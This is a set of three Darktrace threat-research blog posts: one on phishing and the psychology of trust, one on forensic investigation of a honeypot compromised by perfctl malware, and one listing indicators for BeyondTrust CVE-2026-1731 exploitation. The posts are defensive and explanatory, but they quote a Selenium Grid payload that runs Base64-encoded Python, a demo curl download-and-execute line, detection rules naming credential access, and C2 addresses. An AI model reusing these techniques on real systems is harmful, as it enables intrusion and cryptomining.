July 18, 2023

Understanding Email Security & the Psychology of Trust

We explore how psychological research into the nature of trust relates to our relationship with technology - and what that means for AI solutions.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research

When security teams discuss the possibility of phishing attacks targeting their organization, often the first reaction is to assume compromise is inevitable because of the users. Users are typically referenced in cyber security conversations as an organization’s greatest weakness, cited as the cause of many grave cyber-attacks because they click links, open attachments, or approve multi-factor authentication requests without verifying their purpose.

While for many, the weakness of the user may feel like a fact rather than a theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness training. The psychology of trust and the nature of human reliance on technology make it very difficult – if not impossible – to prepare users for the exploitation of that trust in technology.

This Darktrace long read will highlight principles of psychological and sociological research regarding the nature of trust, the elements of trust that relate to technology, and how the human brain is wired to rely on implicit trust. These principles all point to the same outcome: humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to that challenge.

What is the psychology of trust?

Psychological and sociological theories on trust largely centre around the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impacts of trust decisions on interpersonal relationships, and the characteristics which make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability.1

Most behavioural evaluations of trust decisions examine why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust need to be understood in a broader context: trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts which require the brain to categorize information and determine possible dangers. More broadly, successful trust relationships are essential to maintaining the fabric of human society, and critical to every element of human life.

Trust can be compared to dark matter (Rotenberg, 2018) – the extensive but difficult-to-observe material that binds planets and earthly matter. In the same way, trust is an integral but often silent component of human life, connecting people and enabling social functioning.2

Defining implicit and routine trust

As briefly mentioned earlier, dependence is an essential element of a trusting relationship. A routine of trust, built on the maintenance rather than the re-establishment of trust, becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust that friend each time one has new experiences.

Active and passive levels of cognition are important to recognize in decision-making, including trust choices. Decision-making is often an active cognitive process requiring significant resources from the brain. However, many decisions occur passively, especially if they are not new choices, e.g. habits or routines. The brain’s focus turns to immediate tasks while relegating habitual choices to subconscious thought processes – passive cognition. Passive cognition leaves the brain open to the effects of inattentional blindness, wherein the individual may be abstractly aware of a choice, but it is not the focus of their thought processes or actively acknowledged as a decision. These levels of cognition are mostly referenced as “attention” within the brain’s cognition and processing.3

This idea is essentially a concept of implicit trust, meaning trust which is occurring as background thought processes rather than active decision-making. This implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choice and lifestyle. When combined with the dependence on people and services, this implicit trust creates a haze of cognition where trust is implied and assumed, rather than actively chosen across a myriad of scenarios.

Trust and technology

As researchers at the University of Cambridge highlight in their research into trust and technology, ‘In a fundamental sense, all technology depends on trust.’4 The same implicit trust systems that allow us to navigate social interactions by subconsciously choosing to trust also shape our interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.

Most people have a favourite brand of soda. People will routinely purchase that soda and drink it without testing it for chemicals or bacteria and without reading reviews to ensure the companies that produce it have not changed their quality standards. This is a helpful, representative example of routine trust, wherein the trust choice is implied through habitual action rather than through active consideration of the ramifications of continuing to use and trust the product.

The principle of dependence is especially important in discussions of trust and technology, because the modern human is entirely reliant on technology and so has no way to avoid trusting it.5 This is especially true in workplace scenarios: employees are given a mandatory set of technologies – programs, devices, and services – which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between the user and the technology. The key difference between interpersonal trust and technological trust is that deception is often much more difficult to identify.

The implicit trust in workplace technology

To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. Organizations also rely on their employees (users) to use those technologies within accepted policies and operational guidelines. Employees, in turn, rely on the organization to determine which products and services are safe or unsafe.

Within this context, implicit trust is occurring at every layer of the organization and its technological holdings, but often the trust choice is only made annually by a small security team rather than continually evaluated. Systems and programs remain in place for years and are used because “that’s the way it’s always been done.” Against that backdrop, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult for a human to identify.

For example, many organizations use email communications to promote software updates to employees. Typically, these emails prompt employees to update software versions, either from the vendors directly or from public marketplaces such as the App Store on Mac or the Microsoft Store on Windows. If that kind of email were impersonated – spoofing an update and including a malicious link or attachment – there would be no reason for the employee to question it, given the implicit trust reinforced through habitual use of that service and program.

Inattentional blindness: How the brain ignores change

Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices made subconsciously. Changes to these technologies are often subject to inattentional blindness, a psychological phenomenon wherein the brain overwrites sensory information with what it expects to see rather than what is actually perceived.

A great example of inattentional blindness6 is the following experiment, which asks individuals to count the number of times a ball is passed between multiple people. While that is occurring, something else is going on in the background which, statistically, those tested will not see. The shocking part of the experiment comes afterwards, when the researcher reveals that the unseen event occurring in the background was a person in a gorilla suit moving back and forth through the group. This highlights how significant details can be overlooked by the brain and “overwritten” with other sensory information. Applied to technology, inattentional blindness and implicit trust make changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans to spot.

With all this in mind, how can you prepare users to correctly anticipate or identify a violation of that trust when their brains subconsciously make trust decisions and unintentionally ignore cues to suggest a change in behaviour? The short answer is, it’s difficult, if not impossible.

How threats exploit our implicit trust in technology

Most cyber threats are built around the idea of exploiting the implicit trust humans place in technology. Whether through techniques like “living off the land”, wherein programs normally associated with expected activities are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns or scams, many cyber threats are predicated on the exploitation of human trust, rather than simply evading technological safeguards or building backdoors into programs.

In the case of phishing, it is easy to identify attempts to leverage users’ trust in technology and services. The most common example is spoofing, one of the tactics most frequently observed by Darktrace/Email. Spoofing is the mimicking of a trusted user or service, and can be accomplished through a variety of mechanisms, be it the creation of a fake domain meant to mirror a trusted one, or the creation of an email account which appears to belong to a Human Resources, Internal Technology or Security service.

In the case of a falsified internal service, often dubbed a “Fake Support Spoof”, the user is exploited by following instructions from an accepted organizational authority figure and service provider, whose instructions would normally be followed. These cases are often difficult to spot from the sender’s address or the text of the email alone, and they become even harder to detect if an account belonging to one of those services is compromised, so that the sender’s address is legitimate and expected for correspondence. Especially given the context of implicit trust, detecting deception in these cases would be extremely difficult.

How email security solutions can solve the problem of implicit trust

How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is by using email security solutions that leverage behavioural analysis via anomaly detection, rather than traditional email gateways.

Expecting humans to identify the exploitation of their own trust is a high-risk, low-reward endeavour, especially when it takes different forms, affects different users or portions of the organization differently, and doesn’t always have obvious red flags to identify it as suspicious. Cue email security using anomaly detection as the key answer to this evolving problem.

Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams, and enables the identification of departures from the norm – even those designed to mimic expected activity. Using anomaly detection mitigates multiple human cognitive biases which might prevent teams from identifying evolving threats, and helps ensure that malicious behaviour is detected. Anomaly detection does mean that security teams may be alerted to benign anomalous activity, but it also means that no threat, no matter how novel or cleverly packaged, goes unnoticed and unreported to the human security team.

Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision-making and enables the identification of patterns and the categorization of information without the framing and biases that allow trust to be leveraged and exploited.
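To make the idea concrete, here is a minimal, purely illustrative sketch of unsupervised anomaly detection over per-email features. It is not a description of Darktrace’s models: the feature names, values, and the choice of an Isolation Forest are assumptions made for the example.

# Purely illustrative: a toy unsupervised anomaly detector over per-email features.
# Feature names, values, and the model choice are assumptions for this sketch,
# not a description of any vendor's actual implementation.
import numpy as np
from sklearn.ensemble import IsolationForest

# Each row: [sender_rarity, link_count, newly_registered_domain, send_time_deviation]
historical_emails = np.array([
    [0.02, 1, 0, 0.1],
    [0.01, 0, 0, 0.2],
    [0.03, 2, 0, 0.1],
    [0.02, 1, 0, 0.3],
] * 50)  # repeated to mimic a larger history of "normal" mail flow

model = IsolationForest(contamination=0.01, random_state=0).fit(historical_emails)

# A new email: very rare sender, several links, newly registered domain, odd send time.
new_email = np.array([[0.95, 4, 1, 0.9]])
print("anomaly score:", model.decision_function(new_email)[0])  # lower = more anomalous
print("flagged:", model.predict(new_email)[0] == -1)

In practice the value comes from the breadth and quality of the features and from continuously re-learning what “normal” looks like for each organization, rather than from any particular algorithm.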

For example, say a cleverly written email is sent from an address which appears to be a Microsoft affiliate, suggesting that the user needs to patch their software due to the discovery of a new vulnerability. The sender’s address appears legitimate, and news stories are circulating on major media outlets that a new Microsoft vulnerability is causing organizations a lot of problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download and only requires a few minutes to install. Whether this email was created by a service like ChatGPT (generative AI) or written by a person, if acted upon it would hand the threat actor(s) the user’s credentials and, if the software is downloaded, activate malware on the device and possibly the broader network.

If we rely on users to identify this as unusual, there are many cues reinforcing their implicit trust in Microsoft services that make them want to comply with the email rather than question it. Comparatively, anomaly detection-driven email security would flag the unusualness of the source: the email would likely not come from a Microsoft-owned IP address, and the sender would be unfamiliar to the organization, which does not normally receive mail from that address. The language might indicate solicitation – an attempt to entice the user to act – and the link could be flagged because it contains a hidden redirect or tailored information which the user cannot see, whether hidden beneath text like “Click Here” or by link shortening. All of this information is present and discoverable in the phishing email, but it is often invisible to human users because of trust decisions made months or even years ago about known products and services.
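As a small illustration of one of those cues – a link whose visible text hides or contradicts the real destination – the following sketch parses an email body and flags mismatched or generic call-to-action links. The sample HTML, domain, and heuristics are invented for the example and are far simpler than what a production system would use.

# Illustrative sketch: surface links whose visible text hides or contradicts the real
# destination. The sample HTML, domain, and heuristics below are invented.
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []            # (href, visible_text) pairs
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def looks_suspicious(href, text):
    host = (urlparse(href).hostname or "").lower()
    text_l = text.lower().strip().rstrip("/")
    if text_l in {"click here", "verify now", "update now"}:
        return True          # generic call-to-action hiding the destination
    shown = text_l.replace("https://", "").replace("http://", "")
    return "." in shown and shown not in host   # displayed "domain" differs from real host

email_html = '<p>Please <a href="http://update-rnicrosoft.example.net/dl">Click Here</a> to patch.</p>'
auditor = LinkAuditor()
auditor.feed(email_html)
for href, text in auditor.links:
    print(href, "->", repr(text), "suspicious:", looks_suspicious(href, text))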

AI-driven Email Security: The Way Forward

Email security solutions employing anomaly detection are critical weapons for security teams in the fight to stay ahead of evolving threats and varied kill chains, which grow more complex year on year. The intertwining nature of technology, coupled with society’s massive reliance on it, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues into an organization. The changing nature of phishing and social engineering made possible by generative AI is just a drop in the ocean of possible threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate attacks that target users and technology through the exploitation of trust.

References

1. https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx

2. Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.

3. https://www.cognifit.com/gb/attention

4. https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common

5. Tyler, T.R. and Kramer, R.M. (2001). Trust in Organizations: Frontiers of Theory and Research. Thousand Oaks, CA: Sage Publications, pp. 39–49.

6. https://link.springer.com/article/10.1007/s00426-006-0072-4

March 5, 2026

Inside Cloud Compromise: Investigating Attacker Activity with Darktrace / Forensic Acquisition & Investigation


Investigating cloud attacks with Darktrace / Forensic Acquisition & Investigation

Darktrace / Forensic Acquisition & Investigation™ is the industry’s first truly automated forensic solution purpose-built for the cloud. This blog will demonstrate how an investigation can be carried out against a compromised cloud server in minutes, rather than hours or days.

The compromised server investigated in this case originates from Darktrace’s Cloudypots system, a global honeypot network designed to observe adversary activity in real time across a wide range of cloud services. Whenever an attacker successfully compromises one of these honeypots, a forensic copy of the virtual server's disk is preserved for later analysis. Using Forensic Acquisition & Investigation, analysts can then investigate further and obtain detailed insights into the compromise, including complete attacker timelines and root cause analysis.

Forensic Acquisition & Investigation supports importing artifacts from a variety of sources, including EC2 instances, ECS, S3 buckets, and more. The Cloudypots system produces a raw disk image whenever an attack is detected and stores it in an S3 bucket. This allows the image to be directly imported into Forensic Acquisition & Investigation using the S3 bucket import option.

As Forensic Acquisition & Investigation runs cloud-natively, no additional configuration is required to add a specific S3 bucket. Analysts can browse and acquire forensic assets from any bucket that the configured IAM role is permitted to access. Operators can also add additional IAM credentials, including those from other cloud providers, to extend access across multiple cloud accounts and environments.
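For readers who want a feel for what acquiring an artifact from S3 involves at the API level, the snippet below is a generic boto3 sketch, not Forensic Acquisition & Investigation’s own interface. The bucket and key names are invented, and it assumes the ambient IAM role has s3:ListBucket and s3:GetObject on the bucket.

# Generic AWS usage only - not the product's API. Bucket, key, and role are assumptions.
import boto3

s3 = boto3.client("s3")                     # uses whatever IAM credentials the environment provides
bucket = "cloudypots-forensics"             # assumed bucket name
key = "captures/honeypot-042/disk.raw"      # assumed object key for the preserved disk image

# Browse available artifacts (requires s3:ListBucket).
for obj in s3.list_objects_v2(Bucket=bucket).get("Contents", []):
    print(obj["Key"], obj["Size"])

# Acquire the image locally for analysis (requires s3:GetObject).
s3.download_file(bucket, key, "disk.raw")
print("downloaded", key, "from", bucket)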

Figure 1: Forensic Acquisition & Investigation import screen.

Forensic Acquisition & Investigation then retrieves a copy of the file and automatically begins running the analysis pipeline on the artifact. This pipeline performs a full forensic analysis of the disk and builds a timeline of the activity that took place on the compromised asset. By leveraging Forensic Acquisition & Investigation’s cloud-native analysis system, this process condenses hours of manual work into just minutes.

Figure 2: Successful import of a forensic artifact and initiation of the analysis pipeline.

Once processing is complete, the preserved artifact is visible in the Evidence tab, along with a summary of key information obtained during analysis, such as the compromised asset’s hostname, operating system, cloud provider, and key event count.

Figure 3: The Evidence overview showing the acquired disk image.

Clicking on the “Key events” field in the listing opens the timeline view, automatically filtered to show system-generated alarms.

The timeline provides a chronological record of every event that occurred on the system, derived from multiple sources, including:

  • Parsed log files, such as the systemd journal, audit logs, application-specific logs, and others.
  • Parsed history files, such as .bash_history, allowing executed commands to be shown on the timeline.
  • File-specific events, such as files being created, accessed, or modified, and executables being run.

This approach allows timestamped information and events from multiple sources to be aggregated and parsed into a single, concise view, greatly simplifying the data review process.
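The same aggregation idea can be sketched in a few lines of Python. This is only a toy “super-timeline” to illustrate the concept of normalizing heterogeneous, timestamped sources into one sorted view; the real pipeline parses far more sources, and far more carefully.

# Toy super-timeline: normalize events from different sources into
# (timestamp, source, description) tuples and sort them into a single view.
# The parsing is deliberately simplistic and the sources are illustrative.
from datetime import datetime, timezone
import os

def bash_history_events(path):
    # .bash_history carries no per-command timestamps by default; approximate with the
    # file's modification time (a real parser would use HISTTIMEFORMAT entries if present).
    if not os.path.exists(path):
        return
    mtime = datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)
    with open(path, errors="replace") as fh:
        for line in fh:
            yield (mtime, "bash_history", f"command: {line.strip()}")

def file_events(root):
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.stat(full)
            except OSError:
                continue
            yield (datetime.fromtimestamp(st.st_mtime, tz=timezone.utc),
                   "filesystem", f"modified: {full}")

def build_timeline(*sources):
    return sorted((event for src in sources for event in src), key=lambda e: e[0])

timeline = build_timeline(
    bash_history_events(os.path.expanduser("~/.bash_history")),
    file_events("/tmp"),
)
for ts, source, description in timeline[:20]:
    print(ts.isoformat(), source, description)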

Alarms are created for specific timeline events that match either a built-in system rule, curated by Darktrace’s Threat Research team, or an operator-defined rule created at the project level. These alarms help quickly filter out noise and highlight events of interest, such as the creation of a file containing known malware, access to sensitive files like Amazon Web Services (AWS) credentials, suspicious arguments or commands, and more.
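Conceptually, an alarm rule is just a predicate over timeline events with a severity attached. The sketch below shows that idea with invented rules, severities, and event strings; it does not reproduce the product’s actual rule syntax.

# Illustrative rule-based alarming over timeline events. Rule patterns, severities,
# and the sample events are invented to demonstrate the concept only.
import re

RULES = [
    {"name": "Base64 passed to an interpreter", "severity": 3,
     "pattern": re.compile(r"python3?\s+-c\s+.*base64", re.IGNORECASE)},
    {"name": "Access to AWS credentials file", "severity": 3,
     "pattern": re.compile(r"\.aws/credentials")},
    {"name": "Download utility invoked", "severity": 1,
     "pattern": re.compile(r"\b(wget|curl)\b")},
]

def evaluate(description):
    return [(r["name"], r["severity"]) for r in RULES if r["pattern"].search(description)]

sample_events = [
    "command: curl -o /tmp/payload http://198.51.100.7/payload",
    "command: /usr/bin/python3 -c 'import base64;exec(base64.b64decode(...))'",
    "file accessed: /home/ubuntu/.aws/credentials",
]
for description in sample_events:
    for name, severity in evaluate(description):
        print(f"[severity {severity}] {name}: {description}")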

Figure 4: The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.

In this case, several alarms were generated for suspicious Base64 arguments being passed to Selenium. Examining the event data, it appears the attacker spawned a Selenium Grid session with the following payload:

"request.payload": "[Capabilities {browserName: chrome, goog:chromeOptions: {args: [-cimport base64;exec(base64...], binary: /usr/bin/python3, extensions: []}, pageLoadStrategy: normal}]"

This is a common attack vector for Selenium Grid. The chromeOptions object is intended to specify arguments for how Google Chrome should be launched; however, in this case the attacker has abused the binary field to execute the Python3 binary instead of Chrome. Combined with the option to specify command-line arguments, the attacker can use Python3’s -c option to execute arbitrary Python code, in this instance, decoding and executing a Base64 payload.
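One way a defender might hunt for this pattern is to audit Selenium Grid “new session” requests for a chromeOptions binary that is not Chrome, or for arguments carrying Base64/exec markers. The sketch below uses a simplified, invented stand-in for a session payload; real requests are nested inside the Grid’s JSON protocol and would need unwrapping first.

# Illustrative sketch: flag Selenium Grid session capabilities where chromeOptions has
# been repurposed to launch an arbitrary interpreter. The payload below is an invented,
# simplified stand-in for a real new-session request.
import json

SUSPICIOUS_MARKERS = ("base64", "exec(", "import ")

def audit_capabilities(caps):
    findings = []
    opts = caps.get("goog:chromeOptions", {})
    binary = opts.get("binary", "")
    if binary and "chrome" not in binary.lower():
        findings.append(f"non-Chrome binary requested: {binary}")
    for arg in opts.get("args", []):
        if any(marker in arg for marker in SUSPICIOUS_MARKERS):
            findings.append(f"suspicious argument: {arg[:60]}")
    return findings

session_request = json.loads("""
{
  "browserName": "chrome",
  "goog:chromeOptions": {
    "binary": "/usr/bin/python3",
    "args": ["-cimport base64;exec(base64.b64decode('...'))"]
  }
}
""")

for finding in audit_capabilities(session_request):
    print("ALERT:", finding)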

Selenium’s logs truncate the Arguments field automatically, so an alternate method is required to retrieve the full payload. To do this, the search bar can be used to find all events that occurred around the same time as this flagged event.

Figure 5: Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].

Scrolling through the search results, an entry from Java’s systemd journal can be identified. This log contains the full, unaltered payload. GCHQ’s CyberChef can then be used to decode the Base64 data into the attacker’s script, which will ultimately be executed.
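Outside of CyberChef, the same “From Base64” step takes a couple of lines of standard-library Python, and a quick follow-up regex can pull out any URLs the decoded script reaches for. The encoded blob below is a harmless, invented stand-in for the real payload.

# Decode a recovered Base64 blob and triage it for network indicators.
# The blob here is a harmless, invented stand-in for the attacker's real payload.
import base64
import re

recovered_blob = base64.b64encode(
    b"import os\nos.system('curl -o /tmp/x http://203.0.113.9/x && chmod +x /tmp/x')"
).decode()

script = base64.b64decode(recovered_blob).decode("utf-8", errors="replace")
print(script)

# Quick triage: any URLs the decoded script reaches out to.
print(re.findall(r"https?://\S+", script))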

Figure 6: Decoding the attacker’s payload in CyberChef.

In this instance, the malware was identified as a variant of a campaign that has been previously documented in depth by Darktrace.

Investigating Perfctl Malware

This campaign deploys a malware sample known as ‘perfctl’ to the compromised host. The script executed by the attacker downloads a Go binary named “promocioni.php” from 200[.]4.115.1. Its functionality is consistent with previously documented perfctl samples, with only minor changes such as updated filenames and a new command-and-control (C2) domain.

Perfctl is a stealthy malware with several mechanisms designed to evade detection. The main binary is packed with UPX, with the header intentionally tampered with to prevent unpacking using standard tools. The binary also avoids executing any malicious code if it detects debugging or tracing activity, or if artifacts left by earlier stages are missing.

To further aid its evasive capabilities, perfctl includes a usermode rootkit installed via LD preloading. This causes dynamically linked executables to load perfctl’s rootkit payload before other shared libraries, allowing it to override functions – for example, intercepting calls that list files and stripping its own entries from the returned results. Perfctl uses this to hide its own files, as well as related files like ld.so.preload itself, preventing users from identifying that a rootkit is present in the first place.

This also makes it difficult to dynamically analyze, as even analysts aware of the rootkit will struggle to get around it due to its aggressiveness in hiding its components. A useful trick is to use the busybox-static utilities, which are statically linked and therefore immune to LD preloading.
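That trick can be scripted on the live host. The sketch below compares a directory listing taken through the (dynamically linked, and therefore hookable) Python process with one taken via a statically linked busybox; entries only busybox can see are candidates for rootkit-hidden files. The busybox path is an assumption, and the comparison is only meaningful when run on the infected system itself.

# Sketch of the busybox trick: anything a statically linked "busybox ls" can see but a
# dynamically linked (potentially LD-preload-hooked) process cannot is a candidate
# rootkit-hidden file. Assumes a statically linked busybox at /opt/busybox.
import os
import subprocess

BUSYBOX = "/opt/busybox"   # path to a statically linked busybox binary (assumption)

def hidden_entries(directory):
    via_libc = set(os.listdir(directory))            # goes through the hookable dynamic loader
    listing = subprocess.run([BUSYBOX, "ls", "-1a", directory],
                             capture_output=True, text=True, check=True).stdout
    via_static = {name for name in listing.splitlines() if name not in (".", "..")}
    return via_static - via_libc

for name in sorted(hidden_entries("/etc")):
    print("hidden from dynamically linked tools:", name)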

Perfctl will attempt to use sudo to escalate its permissions to root if the user it was executed as has the required privileges. Failing this, it will attempt to exploit CVE-2021-4034 (PwnKit), a local privilege escalation vulnerability in Polkit’s pkexec.

Ultimately, perfctl will attempt to establish a C2 link via Tor and spawn an XMRig miner to mine the Monero cryptocurrency. The traffic to the mining pool is encapsulated within Tor to limit network detection of the mining traffic.

Darktrace’s Cloudypots system has observed 1,959 infections of the perfctl campaign across its honeypot network in the past year, making it one of the most aggressive campaigns seen by Darktrace.

Key takeaways

This blog has shown how Darktrace / Forensic Acquisition & Investigation equips defenders in the face of a real-world attacker campaign. By using this solution, organizations can acquire forensic evidence and investigate intrusions across multiple cloud resources and providers, enabling defenders to see the full picture of an intrusion on day one. Forensic Acquisition & Investigation’s patented data-processing system takes advantage of the cloud’s scale to rapidly process large amounts of data, allowing triage to take minutes, not hours.

Darktrace / Forensic Acquisition & Investigation is available as Software-as-a-Service (SaaS) but can also be deployed on-premises as a virtual application or natively in the cloud, providing flexibility between convenience and data sovereignty to suit any use case.

Support for acquiring traditional compute instances like EC2, as well as more exotic and newly targeted platforms such as ECS and Lambda, ensures that attacks taking advantage of Living-off-the-Cloud (LOTC) strategies can be triaged quickly and easily as part of incident response. As attackers continue to develop new techniques, the ability to investigate how they use cloud services to persist and pivot throughout an environment is just as important to triage as a single compromised EC2 instance.

Credit to Nathaniel Bill (Malware Research Engineer)



February 19, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding


Note: Darktrace's Threat Research team is publishing now to help defenders. We will continue updating this blog as our investigations unfold.

Background

On February 6, 2026, BeyondTrust, a vendor of identity and access management solutions, announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution via specially crafted requests. This vulnerability affects BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against BeyondTrust technology have been linked to nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from the Cybersecurity and Infrastructure Security Agency (CISA), and later investigation showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with the React2Shell mass exploitation previously observed by Darktrace: the command-and-control (C2) domain avg.domaininfo[.]top was seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing (OAST); these services are commonly abused by threat actors for exploit validation. Associated Darktrace models include:

  • Compromise / Possible Tunnelling to Bin Services

Suspicious executable file downloads. Associated Darktrace models include:

  • Anomalous File / EXE from Rare External Location

Outbound beaconing to rare domains. Associated Darktrace models include:

  • Compromise / Agent Beacon (Medium Period)
  • Compromise / Agent Beacon (Long Period)
  • Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
  • Compromise / Beacon to Young Endpoint
  • Anomalous Server Activity / Rare External from Server
  • Compromise / SSL Beaconing to Rare Destination

Unusual cryptocurrency mining activity. Associated Darktrace models include:

  • Compromise / Monero Mining
  • Compromise / High Priority Crypto Currency Mining

And model alerts for:

  • Compromise / Rare Domain Pointing to Internal IP

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior are listed below; a short sketch for sweeping logs against these indicators follows the list.

  • 217.76.57[.]78 – IP address – Likely C2 server
  • hXXp://217.76.57[.]78:8009/index.js – URL – Likely payload
  • b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7 – SHA1 – Likely payload
  • 195.154.119[.]194 – IP address – Likely C2 server
  • hXXp://195.154.119[.]194/index.js – URL – Likely payload
  • avg.domaininfo[.]top – Hostname – Likely C2 server
  • 104.234.174[.]5 – IP address – Possible C2 server
  • 35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload
  • hXXp://134.122.13[.]34:8979/c – URL – Possible payload
  • 134.122.13[.]34 – IP address – Possible C2 server
  • 28df16894a6732919c650cc5a3de94e434a81d80 – SHA1 – Possible payload
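As a starting point for threat hunting, the indicators above can be refanged and swept against whatever plain-text logs are available (proxy, DNS, or flow exports). The sketch below shows the idea; the log path is an assumption, and simple substring matching will not catch every encoding of an indicator.

# Minimal IoC sweep: refang the defanged indicators above and search a plain-text log.
# The log path is an assumption; substring matching is a starting point, not a guarantee.
iocs = [
    "217.76.57[.]78",
    "195.154.119[.]194",
    "avg.domaininfo[.]top",
    "104.234.174[.]5",
    "134.122.13[.]34",
]

def refang(indicator):
    return indicator.replace("[.]", ".")

refanged = [refang(ioc) for ioc in iocs]

log_path = "/var/log/proxy/access.log"   # assumed location of proxy or DNS logs
with open(log_path, errors="replace") as fh:
    for lineno, line in enumerate(fh, 1):
        for ioc in refanged:
            if ioc in line:
                print(f"{log_path}:{lineno}: hit for {ioc}: {line.strip()}")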

References:

1. https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2. https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3. https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

About the author
Emma Foulger
Global Threat Research Operations Lead